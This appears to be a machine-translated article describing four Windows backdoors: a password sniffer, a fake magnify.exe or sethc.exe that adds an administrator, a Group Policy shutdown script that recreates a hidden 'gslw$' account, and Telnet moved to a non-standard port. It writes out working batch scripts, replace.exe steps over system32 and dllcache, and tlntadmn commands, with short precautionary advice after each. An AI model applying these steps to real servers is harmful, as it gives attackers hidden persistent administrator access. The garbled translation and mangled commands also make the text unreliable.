Windows - the system of the back four

The attacker is a back door out of the channel system, hidden and dangerous. If the attacker entering an unpeopled land, following four Show-down I could not understand it all but a very dangerous back door.
1, sniffer fraud, the most dangerous back door
This type of attack is a back door in the control of the host, not create a new account but in the host installation tool sniffers to steal the administrator password. In view of the back door, does not create a new account but by sniffer access to the administrator password, it is highly concealed, if the administrator is not high safety awareness and a lack of adequate safety skills, then it is simply can not be found.
(1). Sniffer installation tool
The attacker will be the sniffer tools to download or upload to the server, and then you can install. It should be noted that these tools sniffer generally small size and function of a single, but are often made in the form of drive, so highly concealed, it is difficult to find clear it would be inappropriate.
(2). Administrator password access
Sniffer tools to monitor the implementation of the system, when the administrator password to log server when it stolen, then the administrator password sniffer tool will be saved to a txt file. When the attacker log on the next server, you can open the txt file access to the administrator password. Since then, his server log on again but do not have to re-create accounts directly with the legitimate administrator account login server. If the server is a Web, an attacker would be to place the txt file to a web directory, and then will be able to browse the local view of the document.
(3). Precautionary measures
The attacker sniffing the back door to a normal system administrator account, it is difficult to find, however, that any invasion would leave clues, we can enable the group policy of "strategic review" of its users log on to conduct record, and then through Event Viewer to see if there is any suspicion of illegal log on time. However, a clever attacker would delete or modify the system log, the most radical measures are installed in the system to clear the sniffer tools, and then change the administrator password.
2, a magnifying glass program, the most cunning of the back door
Magnifying glass (magnify.exe) is a Windows 2000/XP/2003 systems integration of a small tool, it is convenient for visually impaired users designed. In the user log on before the system can "Win + U" key combination to call the tool, so an attacker to use carefully constructed of the same name magnify.exe file a magnifying glass to replace the procedure in order to control the server.Typically, the attacker through the construction process magnify.exe administrator to create a user, and then log on the system. Of course, sometimes they would call through its direct command prompt (cmd.exe) or the system shell (explorer.exe). It should be noted that such procedures are calling Permissions system, the system that is the highest authority. However, just in case when an administrator to run the program a magnifying glass to find flaws, an attacker through the general structure of the procedures required for the completion of the operation, the operation will be the last real magnifying glass procedures in order to deceive the administrator. Its use is:
(1). Tectonic batch script@ Echo offNet user gslw $ test168 / addNet localgroup administrators gslw $ / add% Windir% \ system32 \ nagnify.exeExitThe above script will be saved as magnify.bat, its role is to create a password for the administrator test168 users gslw $, run the last name magnifying glass after the procedure nagnify.exe
(2). File format conversion
As of magnify.bat batch file suffix is the bat, the need to convert it to the exe files of the same name can only be adopted by the combination of keys Win + U call. An attacker can use WinRar general structure of a self-extracting exe files and, of course, can be used bat2com, com2exe file format for the conversion. We are on the way to the back of an example for demonstration.Open the command line, enter the bat2com, com2exe tool's directory, and then run the command "bat2com magnify.bat" will magnify.bat into magnify.com, continue to run the command "com2exe magnify.com" will magnify.com into magnify.exe , Which had a batch file into a magnifying glass and procedures of the same name of the file
(3). Magnifying glass to replace paper
The following will need to use the structure magnify.exe of the same name to replace the program files a magnifying glass, as the Windows system files on the self-protection, can not be directly replaced, but Windows provides a command replace.exe, through which we can replace the system files. In addition, because of system files in the% Windir% \ system32 \ dllcache back up there, in order to prevent the replacement of paper and then re-restored, we must first of all replace the directory magnify.exe files. Assuming the structure magnify.exe file% Windir% in the directory, we can achieve through a batch of documents can be replaced.@ Echo offcopy% Windir% \ system32 \ dllcache \ magnify.exe nagnify.execopy% Windir% \ system32 \ magnify.exe nagnify.exereplace.exe% Windir% \ magnify.exe% Windir% \ system32 \ dllcachereplace.exe% Windir% \ magnify.exe% Windir% \ system32ExitBatch processing function of the above is that the magnifying glass will be the first back-up procedures for nagnify.exe, of the same name and then use the procedure to replace the structure.(4). Advantage of attack
Upon the completion of the above-mentioned operation, a magnifying glass to make a back door. Then the attacker through the Remote Desktop Connection server, log in the interface window of the local press under the keyboard of the "Win + U" key combination, to choose which to run a "magnifying glass", this time on the server administrator to create a user and opened the gslw $ Magnifying glass tool, and then the attacker opened the account through the login server. Of course, the attacker log on off before the account and delete all related information in order to avoid being discovered administrator.
(5). Precautionary measures
Into the% Windir% \ system32 \ view magnify.exe document is the original icon is a magnifying glass icon, if not, then most likely be the back door into a magnifying glass. Of course, sometimes the attacker will be to change the icon for the file and the program's original icon, like a magnifying glass. At this point we can see magnify.exe file size and modified, if both are not on a comparison of the doubt. We also can run magnify.exe, and then run lusrmgr.msc to see if there is any suspicion of users. If the server is placed a magnifying glass back door, first of all, you want to delete the file, and then return to normal procedures magnifying glass. Of course, we could have done more thorough, a matter of procedure to replace a magnifying glass program. We can even dealing also one of its governing body, a structure magnify.exe, through its attacker or a warning for the invasion and control of evidence.Added: magnifying glass back door and were similar to the "sticky keys" back door, that is, press the button SHIEF five key functions can be activated viscous, and its use of preventive measures similar to the back door with a magnifying glass, but will be replaced by magnify.exe the sethc. exe.3, and Group Policy to deceive, the most hidden back doorOn the other hand, Group Policy cover more the back door. Add to the list in the table with the corresponding keys to realize the system and start running horse is commonly used tactic known for. In fact, the most in the strategy, they can fulfill the function, not only so it can be achieved when the system shut down some operations. This is the strategy adopted by most of the "script (start / shutdown)" for the realization of items. The specific location of the "computer configuration settings → Windows". Because it is very hidden, so often an attacker to use the server as a back door.An attacker to obtain control of the server on the back door through the implementation of long-term control of the host. It can be run through the back door of certain procedures or script, the simplest such as the creation of a user an administrator, he can do so:
(1). To create a scriptCreate a batch file add.bat, add.bat content is: @ echo off & net user gslw $ test168 / add & & netlocalgroup administrators gslw $ / add & exit (to create a user named gslw $ password for the administrator test168 Users).
(2). To use the back door"Run" dialog box, type gpedit.msc, to the position, "a computer configuration> Windows set-> script (start / shutdown)," Double-click on the right side of the window "shut down", in which the add add.bat. In other words, when the system shut down when the user to create gslw $. For the average user does not know is that the system has a hidden user, that is, and he saw the deletion of the account, when the system shutdown will create the account. So, if users do not know Group Policy in the place that he will not understand.In fact, the group's strategy in the "back door" There are a lot of use of the law, through which an attacker to run scripts or procedures, sniffer administrator password, and so on. When they access the administrator's password, the system would not have to create an account, the direct use of remote log system administrator account. Therefore, it is also a "double-edged sword," we hope that the importance of the place. When the server for you to be inexplicable attacks, an attacker might achieve it through.
4, telnet to deceive, the most easily overlooked the back door
telnet is under the command-line tool telnet, but the management of the server used for no more and no less often ignored by administrators. If an attacker in control of a server, open the "Remote Desktop" remote control is very easy to be aware of the administrator, but the start Telnet remote control was not easy to detect. However, telnet is the default port 23, if open, the others are easy to scan, so an attacker would change the telnet port, so exclusive control over the server.
(1). Revision portLocal modify the Windows 2003 server telnet port is: "The operation began →" enter cmd to open command prompt, and then run the command "tlntadmn config port = 800" (800 is a modified telnet port, the port in order to avoid the conflict do not have to set Known port services.) Of course, we can also modify the remote telnet server port in the command prompt, enter the command "tlntadmn config \ \ 192.168.1.9 port = 800-u gslw-p test168" (\ \ 192.168.1.9 The other IP, port = 800 to be amended for the telnet port,-u specify the other user name,-p specify the other user's password.)
(2). TelnetAn attacker in local running the command prompt (cmd.exe) enter the command "telnet 192.168.1.9 800" and then enter the user name and password records telnet to the server.
(3). Precautionary measuresTelnet to the back door method is simple and can be "tlntadmn config port = n" to change the order of its ports, a more thorough run "services.msc" open management services, disable the telnet service.
Sum up: In fact, no matter what kind of back door have a common characteristic - hidden, is not to see the sun. As long as you acquire a certain amount of technical systems, and constant vigilance will be able to let the back door profiling. Know thy enemy and know and understand the principles of the back door, will be able to fundamentally end the back door.